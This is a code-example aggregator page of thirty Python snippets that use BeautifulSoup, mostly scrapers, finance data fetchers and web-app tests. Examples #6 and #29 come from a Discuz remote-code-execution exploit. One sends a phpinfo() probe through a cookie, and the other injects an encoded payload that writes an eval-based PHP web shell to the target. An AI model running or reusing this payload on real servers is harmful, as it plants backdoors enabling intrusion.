Python bs4.BeautifulSoup() Examples
The following are 30
code examples of bs4.BeautifulSoup().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
bs4
, or try the search function
.
Example #1
Source File: start.py From Starx_Pixiv_Collector with MIT License | 10 votes |
def get_pixiv_user_name(): global login_status tag = 'Get_Pixiv_User_Name' # Check if cookies works. pixiv_www_url = 'https://www.pixiv.net/' check_soup = BeautifulSoup(get_text_from_url(pixiv_www_url), 'html.parser') try: pixiv_user_nick_name = check_soup.find(name='a', attrs={'class': 'user-name js-click-trackable-later'}).string print_with_tag(tag, ['Login as', pixiv_user_nick_name]) except Exception as e: print_with_tag(tag,['Error:',e]) login_status = False print_with_tag(tag,'Failed to check the user name.') print_with_tag(tag,'Might be the cookies is out of the date?') else: login_status = True print_with_tag(tag,'Login success!') #
Example #2
Source File: gitgot.py From GitGot with GNU Lesser General Public License v3.0 | 7 votes |
def gist_fetch(query, page_idx, total_items=1000): gist_url = "https://gist.github.com/search?utf8=%E2%9C%93&q={}&p={}" query = urllib.parse.quote(query) gists = [] try: resp = requests.get(gist_url.format(query, page_idx)) soup = bs4.BeautifulSoup(resp.text, 'html.parser') total_items = min(total_items, int( [x.text.split()[0] for x in soup.find_all('h3') if "gist results" in x.text][0].replace(',', ''))) gists = [x.get("href") for x in soup.findAll( "a", class_="link-overlay")] except IndexError: return {"data": None, "total_items": 0} return {"data": gists, "total_items": total_items}
Example #3
Source File: universal.py From xalpha with MIT License | 7 votes |
def get_rt_from_ft(code, _type="indices"): url = make_ft_url(code, _type=_type) r = rget(url) b = BeautifulSoup(r.text, "lxml") d = {} d["name"] = b.find("h1").string d["current"] = _float(b.find("span", class_="mod-ui-data-list__value").string) d["percent"] = _float( b.select("span[class^='mod-format--']")[0].text.split("/")[-1].strip()[:-1] ) d["current_ext"] = None d["market"] = None d["currency"] = b.find("span", class_="mod-ui-data-list__label").string.split("(")[ 1 ][:-1] d["time"] = b.find("div", class_="mod-disclaimer").string return d
Example #4
Source File: misc.py From xalpha with MIT License | 7 votes |
def get_tdx_holidays(holidays=None, format="%Y-%m-%d"): r = rget("https://www.tdx.com.cn/url/holiday/") r.encoding = "gbk" b = BeautifulSoup(r.text, "lxml") l = b.find("textarea").string.split("\n") if not holidays: holidays = {} for item in l: if item.strip(): c = item.split("|") if c[2] in region_trans: rg = region_trans[c[2]] tobj = dt.datetime.strptime(c[0], "%Y%m%d") tstr = tobj.strftime(format) if rg not in holidays: holidays[rg] = [tstr] else: holidays[rg].append(tstr) return holidays
Example #5
Source File: test_exceptions_handler.py From sanic with MIT License | 7 votes |
def test_chained_exception_handler(): request, response = exception_handler_app.test_client.get( "/6/0", debug=True ) assert response.status == 500 soup = BeautifulSoup(response.body, "html.parser") html = str(soup) assert "response = handler(request, *args, **kwargs)" in html assert "handler_6" in html assert "foo = 1 / arg" in html assert "ValueError" in html assert "The above exception was the direct cause" in html summary_text = " ".join(soup.select(".summary")[0].text.split()) assert ( "ZeroDivisionError: division by zero while handling path /6/0" ) == summary_text
Example #6
Source File: dz-ml-rce.py From discuz-ml-rce with MIT License | 7 votes |
def dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout): tgtUrl = tgtUrl check_payload = setcookie_language_value + '\'.phpinfo().\';' headers = {} headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36"; headers["Cookie"] = check_payload; check_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False) #print headers['Cookie'] if check_rsp.status_code == 200: try: if (check_rsp.text.index('PHP Version')): print 'target is vulnerable!!!' else: soup = BeautifulSoup(check_rsp.text, 'lxml') if (soup.find('title')): print 'target seem not vulnerable-' + 'return title: ' + str(soup.title.string) + '\n' except ValueError, e: print 'target seem not vulnerable-' + e.__repr__() except:
Example #7
Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_edit_and_preview_links_on_schema_preview_page(self, testapp): department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True) # set up a user create_and_log_in_user(testapp, department) # make a request to specific front page for page in ['complaints', 'useofforce', 'ois', 'assaultsonofficers']: response = testapp.get("/department/{}/preview/schema/{}".format(department.id, page)) assert response.status_code == 200 soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="/department/{}/edit/schema/{}".format(department.id, page)) is not None assert soup.find("a", href="/department/{}".format(department.id)) is not None
Example #8
Source File: start.py From Starx_Pixiv_Collector with MIT License | 6 votes |
def get_illust_infos_from_illust_url(url): data_dict = {} illust_url_content = get_text_from_url(url) # illust_url_content.encoding = 'unicode_escape' new_soup = BeautifulSoup(illust_url_content,'html.parser') json_data = new_soup.find(name='meta',attrs={'name':'preload-data'}).attrs['content'] format_json_data = demjson.decode(json_data) pre_catch_id = list(format_json_data['illust'].keys())[0] illust_info = format_json_data['illust'][pre_catch_id] # get each value data_dict['illustId'] = illust_info['illustId'] data_dict['illustTitle'] = illust_info['illustTitle'] data_dict['illustComment'] = illust_info['illustComment'] data_dict['createDate'] = illust_info['createDate'] data_dict['illustType'] = illust_info['illustType'] data_dict['urls'] = illust_info['urls'] # data_dict['tags']=illust_info['tags'] data_dict['userId'] = illust_info['userId'] data_dict['userName'] = illust_info['userName'] data_dict['userAccount'] = illust_info['userAccount'] data_dict['likeData'] = illust_info['likeData'] data_dict['width'] = illust_info['width'] data_dict['height'] = illust_info['height'] data_dict['pageCount'] = illust_info['pageCount'] data_dict['bookmarkCount'] = illust_info['bookmarkCount'] data_dict['likeCount'] = illust_info['likeCount'] data_dict['commentCount'] = illust_info['commentCount'] data_dict['viewCount'] = illust_info['viewCount'] data_dict['isOriginal'] = illust_info['isOriginal'] per_tags = illust_info['tags']['tags'] tags_list = [] for tag in range(len(per_tags)): tags_list.append(per_tags[tag]['tag']) data_dict['tags'] = tags_list ########################################################### update_database(data_dict['illustId'], data_dict['illustTitle'], data_dict['illustType'], data_dict['userId'], data_dict['userName'], data_dict['tags'], data_dict['urls']) return data_dict
Example #9
Source File: ebay-watcher.py From ebay-watcher with MIT License | 6 votes |
def watch(self): ''' () -> None Attempts to watch a product on eBay. ''' # Get product watch link try: r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False) except: try: r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False) except: log('e', "Connection failed while loading product on " + self.product_link) return try: watch_link = soup(r.text, "html.parser").find("div", {"id": "vi-atl-lnk"}).a["href"] except: log('e', "Connection failed while loading product on " + self.product_link) return # Watch the product (the second GET actually adds it to watch list) try: r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False) r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False) except: try: r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False) r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False) except: log('e', "Failed to add " + self.product_link + " to watch list.") return # Alert user of progress: Watch product success/failure if("saved in your" in r.text.lower()): log('s', "Added " + self.product_link + " to watch list.") else: log('e', "Couldn't add " + self.product_link + " to watch list.")
Example #10
Source File: google.py From fireprox with GNU General Public License v3.0 | 6 votes |
def check_query(count, url, query): if url[-1] == '/': url = url[:-1] url = f'{url}/search?q={query}&start={count}&num=100' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0', } results = requests.get(url, headers=headers) soup = BeautifulSoup(results.text, 'lxml') with add_lock: idx = 1 for g in soup.find_all('div', class_='r'): link = g.find_all('a')[0]['href'] title = g.find_all('h3')[0] item = f'{title.text} ({link})' search_results.add(item) idx+=1
Example #11
Source File: bing.py From fireprox with GNU General Public License v3.0 | 6 votes |
def check_query(count, url, query): if url[-1] == '/': url = url[:-1] url = f'{url}/search?q={query}&first={count}' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0', } results = requests.get(url, headers=headers) soup = BeautifulSoup(results.text, 'lxml') with add_lock: idx = 1 for g in soup.find_all('li', class_='b_algo'): result = g.find('h2') link = result.find('a')['href'] title = result.text item = f'{title} ({link})' search_results.add(item) idx+=1
Example #12
Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_edit_and_preview_links_on_department_admin_page(sefl, testapp): ''' There are links to preview & edit main and schema pages from the department admin page. ''' department = Department.create(name="B Police Department", short_name="BPD", load_defaults=True) # set up a user create_and_log_in_user(testapp, department) # make a request to specific front page response = testapp.get("/department/{}".format(department.id)) assert response.status_code == 200 soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="{}/preview/useofforce".format(department.id)) is not None assert soup.find("a", href="{}/preview/complaints".format(department.id)) is not None assert soup.find("a", href="{}/preview/ois".format(department.id)) is not None assert soup.find("a", href="{}/preview/pursuits".format(department.id)) is not None assert soup.find("a", href="{}/preview/assaultsonofficers".format(department.id)) is not None assert soup.find("a", href="{}/edit/useofforce".format(department.id)) is not None assert soup.find("a", href="{}/edit/complaints".format(department.id)) is not None assert soup.find("a", href="{}/edit/ois".format(department.id)) is not None assert soup.find("a", href="{}/edit/pursuits".format(department.id)) is not None assert soup.find("a", href="{}/edit/assaultsonofficers".format(department.id)) is not None assert soup.find("a", href="{}/preview/schema/useofforce".format(department.id)) is not None assert soup.find("a", href="{}/preview/schema/complaints".format(department.id)) is not None assert soup.find("a", href="{}/preview/schema/ois".format(department.id)) is not None assert soup.find("a", href="{}/preview/schema/pursuits".format(department.id)) is not None assert soup.find("a", href="{}/preview/schema/assaultsonofficers".format(department.id)) is not None assert soup.find("a", href="{}/edit/schema/useofforce".format(department.id)) is not None assert soup.find("a", href="{}/edit/schema/complaints".format(department.id)) is not None assert soup.find("a", href="{}/edit/schema/ois".format(department.id)) is not None assert soup.find("a", href="{}/edit/schema/pursuits".format(department.id)) is not None assert soup.find("a", href="{}/edit/schema/assaultsonofficers".format(department.id)) is not None
Example #13
Source File: universal.py From xalpha with MIT License | 6 votes |
def get_portfolio_fromttjj(code, start=None, end=None): startobj = dt.datetime.strptime(start, "%Y%m%d") endobj = dt.datetime.strptime(end, "%Y%m%d") if (endobj - startobj).days < 90: return None # note start is always 1.1 4.1 7.1 10.1 in incremental updates if code.startswith("F"): code = code[1:] r = rget("http://fundf10.eastmoney.com/zcpz_{code}.html".format(code=code)) s = BeautifulSoup(r.text, "lxml") table = s.find("table", class_="tzxq") df = pd.read_html(str(table))[0] df["date"] = pd.to_datetime(df["报告期"]) df["stock_ratio"] = df["股票占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1])) df["bond_ratio"] = df["债券占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1])) df["cash_ratio"] = df["现金占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1])) # df["dr_ratio"] = df["存托凭证占净比"].replace("---", "0%").apply(lambda s: xa.cons._float(s[:-1])) df["assets"] = df["净资产(亿元)"] df = df[::-1] return df[["date", "stock_ratio", "bond_ratio", "cash_ratio", "assets"]] # this is the most elegant approach to dispatch get_daily, the definition can be such simple # you actually don't need to bother on start end blah, everything is taken care of by ``cahcedio``
Example #14
Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_edit_and_preview_links_on_preview_page(self, testapp): department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True) # set up a user create_and_log_in_user(testapp, department) # make a request to specific front page for page in ['index', 'complaints', 'useofforce', 'ois', 'assaultsonofficers']: response = testapp.get("/department/{}/preview/{}".format(department.id, page)) assert response.status_code == 200 soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="/department/{}/edit/{}".format(department.id, page)) is not None assert soup.find("a", href="/department/{}".format(department.id)) is not None
Example #15
Source File: Extractor.py From News-At-Command-Line with MIT License | 6 votes |
def ExtractionAlgo(self,text): soup=BeautifulSoup(text,'html.parser') title=soup.title.string Result=[] #print soup maincontent=soup.find_all("div", class_="content__article-body from-content-api js-article__body") #print maincontent for content in maincontent: scripttags=content.find_all(["script","br","figure","image"]) for scripttag in scripttags: scripttag.extract() #print content.text for foundcontent in content.find_all("p"): Result.append(foundcontent.text) Result=''.join(Result) return (title,Result)
Example #16
Source File: Extractor.py From News-At-Command-Line with MIT License | 6 votes |
def ExtractionAlgo(self,text): soup=BeautifulSoup(text,'html.parser') title=soup.title.string Result=[] #print soup maincontent=soup.find_all("div", class_="article") #print maincontent for content in maincontent: scripttags=content.find_all(["script","br","figure","image","span"]) for scripttag in scripttags: scripttag.extract() #print content.text for foundcontent in content.find_all("p"): Result.append(foundcontent.text) Result=''.join(Result) return (title,Result)
Example #17
Source File: Extractor.py From News-At-Command-Line with MIT License | 6 votes |
def ExtractionAlgo(self,text): soup=BeautifulSoup(text,'html.parser') title=soup.title.string Result=[] #print soup maincontent=soup.find_all("div", class_="Normal") #print maincontent for content in maincontent: #print content.text Result.append(content.text) Result=''.join(Result) return (title,Result)
Example #18
Source File: views.py From MPContribs with MIT License | 6 votes |
def export_notebook(nb, cid): nb = nbformat.from_dict(nb) html_exporter = HTMLExporter() html_exporter.template_file = "basic" body = html_exporter.from_notebook_node(nb)[0] soup = BeautifulSoup(body, "html.parser") # mark cells with special name for toggling, and # TODO make element id's unique by appending cid (for ingester) for div in soup.find_all("div", "output_wrapper"): script = div.find("script") if script: script = script.contents[0] if script.startswith("render_json"): div["name"] = "HData" elif script.startswith("render_table"): div["name"] = "Tables" elif script.startswith("render_plot"): div["name"] = "Graphs" else: pre = div.find("pre") if pre and pre.contents[0].startswith("Structure"): div["name"] = "Structures" # name divs for toggling code_cells for div in soup.find_all("div", "input"): div["name"] = "Code" # separate script script = [] for s in soup.find_all("script"): script.append(s.string) s.extract() # remove javascript return soup.prettify(), "\n".join(script)
Example #19
Source File: Extractor.py From News-At-Command-Line with MIT License | 6 votes |
def TextExtractionAlgo(self,text,htmlelement,classname): soup=BeautifulSoup(text,'html.parser') title=soup.title.string Result=[] #print soup maincontent=soup.find_all(htmlelement, class_=classname) #print maincontent for content in maincontent: scripttags=content.find_all(["script","br","figure","image"]) for scripttag in scripttags: scripttag.extract() #print content.text Result.append(content.text) Result=''.join(Result) return (title,Result)
Example #20
Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_about_page_exists(self, testapp): response = testapp.get("/about/", status=200) soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="https://www.codeforamerica.org") is not None
Example #21
Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_non_public_depts_display_for_users_with_access(self, testapp): ''' Users can see links to datasets they're allowed to access on the front page ''' impd = Department.create(name="I Police Department", short_name="IMPD", is_public=True) UseOfForceIncidentIMPD.create(department_id=impd.id, opaque_id="12345abcde") bpd = Department.create(name="B Police Department", short_name="BPD", is_public=False) UseOfForceIncidentBPD.create(department_id=bpd.id, opaque_id="12345abcde") lmpd = Department.create(name="LM Police Department", short_name="LMPD", is_public=False) UseOfForceIncidentLMPD.create(department_id=lmpd.id, opaque_id="12345abcde") # A non logged-in user can only see the public department response = testapp.get("/", status=200) soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="/department/IMPD/useofforce") is not None assert soup.find("a", href="/department/BPD/useofforce") is None assert soup.find("a", href="/department/LMPD/useofforce") is None # A user associated with a particular department can see that department's # available datasets when logged in create_and_log_in_user(testapp=testapp, department=bpd, username="user1") response = testapp.get("/", status=200) soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="/department/IMPD/useofforce") is not None assert soup.find("a", href="/department/BPD/useofforce") is not None assert soup.find("a", href="/department/LMPD/useofforce") is None # A user with admin access can see all departments' available datasets create_and_log_in_user(testapp=testapp, department=impd, rolename='admin', username="user2") response = testapp.get("/", status=200) soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="/department/IMPD/useofforce") is not None assert soup.find("a", href="/department/BPD/useofforce") is not None assert soup.find("a", href="/department/LMPD/useofforce") is not None # Log out and only the public department should be visible testapp.get(url_for('public.logout')).follow() response = testapp.get("/", status=200) soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="/department/IMPD/useofforce") is not None assert soup.find("a", href="/department/BPD/useofforce") is None assert soup.find("a", href="/department/LMPD/useofforce") is None
Example #22
Source File: misc.py From xalpha with MIT License | 6 votes |
def get_ri_status(suburl=None): if not suburl: suburl = "m=cb&a=cb_all" # 可转债 url = "http://www.richvest.com/index.php?" url += suburl r = rget(url, headers={"user-agent": "Mozilla/5.0"}) b = BeautifulSoup(r.text, "lxml") cl = [] for c in b.findAll("th"): cl.append(c.text) nocl = len(cl) rl = [] for i, c in enumerate(b.findAll("td")): if i % nocl == 0: r = [] r.append(c.text) if i % nocl == nocl - 1: rl.append(r) return pd.DataFrame(rl, columns=cl)
Example #23
Source File: proxyLoader.py From premeStock with MIT License | 6 votes |
def filterConnections(proxiesList): workingProxies = [] count = 0 for proxy in proxiesList: count += 1 cprint("Loading proxy # {}".format(count), "green") proxies = { 'http': proxy, 'https': proxy } try: r = requests.get("http://www.supremenewyork.com/shop/all", proxies=proxies, timeout=1) data = r.text soup = BeautifulSoup(data,"html.parser") headerCheck = str(soup.find("span",{"id":"time-zone-name"}).text) if headerCheck == "NYC": cprint(headerCheck, "blue") workingProxies.append(proxy) cprint("Added {}!".format(proxy),"green") else: cprint("Banned!", "red") raise except: cprint("Bad Proxy: {}".format(proxy), "red") return workingProxies
Example #24
Source File: proxyLoader.py From premeStock with MIT License | 6 votes |
def site2(proxiesList): url = "https://www.us-proxy.org/" user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"} r = requests.get(url,headers=user) data = r.text soup = BeautifulSoup(data,"html.parser") table = soup.find("tbody") for ips in table.find_all("tr"): count = 0 proxy = "" for ip in ips.find_all("td"): if count == 0: proxy = str(ip.text) proxy += ":" if count == 1: proxy += str(ip.text) proxiesList.append(proxy) break; count += 1 cprint("Succesfully added {} proxies!".format(len(proxiesList)), 'green')
Example #25
Source File: universal.py From xalpha with MIT License | 6 votes |
def get_newest_netvalue(code): """ 防止天天基金总量 API 最新净值更新不及时,获取基金最新公布净值及对应日期, depracated, use get_rt("F501018") instead :param code: six digits string for fund. :return: netvalue, %Y-%m-%d """ code = code[1:] r = rget("http://fund.eastmoney.com/{code}.html".format(code=code)) s = BeautifulSoup(r.text, "lxml") return ( float( s.findAll("dd", class_="dataNums")[1] .find("span", class_="ui-font-large") .string ), str(s.findAll("dt")[1]).split("(")[1].split(")")[0][7:], )
Example #26
Source File: proxyLoader.py From premeStock with MIT License | 6 votes |
def site4(proxiesList): url = "https://www.proxynova.com/proxy-server-list/country-us/" user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"} r = requests.get(url,headers=user) data = r.text soup = BeautifulSoup(data,"html.parser") proxy = "" # for ips in soup.find_all("tr",{"class":"spy1xx"}): for ips in soup.find_all("tr"): count = 0 for ip in ips.find_all("td",{"align":"left"}): if count == 0: proxy = str(ip.get_text(strip=True).replace("document.write('","").replace("'","").replace("+","").replace(");","").replace(" ","")) if count == 1: proxy += ":"+str(ip.text).strip() proxiesList.append(proxy) break; count += 1
Example #27
Source File: Self.py From CyberTK-Self with GNU General Public License v2.0 | 6 votes |
def yt(query): with requests.session() as s: isi = [] if query == "": query = "S1B tanysyz" s.headers['user-agent'] = 'Mozilla/5.0' url = 'http://www.youtube.com/results' params = {'search_query': query} r = s.get(url, params=params) soup = BeautifulSoup(r.content, 'html5lib') for a in soup.select('.yt-lockup-title > a[title]'): if '&list=' not in a['href']: if 'watch?v' in a['href']: b = a['href'].replace('watch?v=', '') isi += ['youtu.be' + b] return isi
Example #28
Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_home_page_links_to_about(self, testapp): response = testapp.get("/", status=200) soup = BeautifulSoup(response.text, "html.parser") assert soup.find("a", href="/about/") is not None
Example #29
Source File: dz-ml-rce.py From discuz-ml-rce with MIT License | 5 votes |
def dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout): getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';' getshell_exp_send = setcookie_language_value + getshell_exp headers = {} headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36"; headers['Cookie'] = getshell_exp_send filename = tgtUrl.split('/')[-1] getshell_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False) # print headers['Cookie'] if getshell_rsp.status_code == 200: getshell_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False) #print tgtUrl.split('/')[-1] #print tgtUrl.split(filename)[0] + 'x.php' if (getshell_rsp1.status_code) == 200 and (getshell_rsp1.text == ""): print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php' else: #soup = BeautifulSoup(getshell_rsp1.text, 'lxml') print 'Getshell failed!-rsp1 status code: ' + str(getshell_rsp1.status_code) + '\nrsp1 text: ' + getshell_rsp1.text[0:100] else: print 'Target seem not vulnerable-status code: ' + str(getshell_rsp.status_code) + '\n'
Example #30
Source File: get_recipes.py From recipe-box with MIT License | 5 votes |
def get_all_recipes_epi(page_num): base_url = 'http://www.epicurious.com' search_url_str = 'search/?content=recipe&page' url = '{}/{}={}'.format(base_url, search_url_str, page_num) try: soup = BeautifulSoup(request.urlopen( request.Request(url, headers=HEADERS)).read(), "html.parser") recipe_link_items = soup.select('div.results-group article.recipe-content-card a.view-complete-item') recipe_links = [r['href'] for r in recipe_link_items] return {base_url + r: get_recipe(base_url + r) for r in recipe_links} except (HTTPError, URLError): print('Could not parse page {}'.format(url)) return []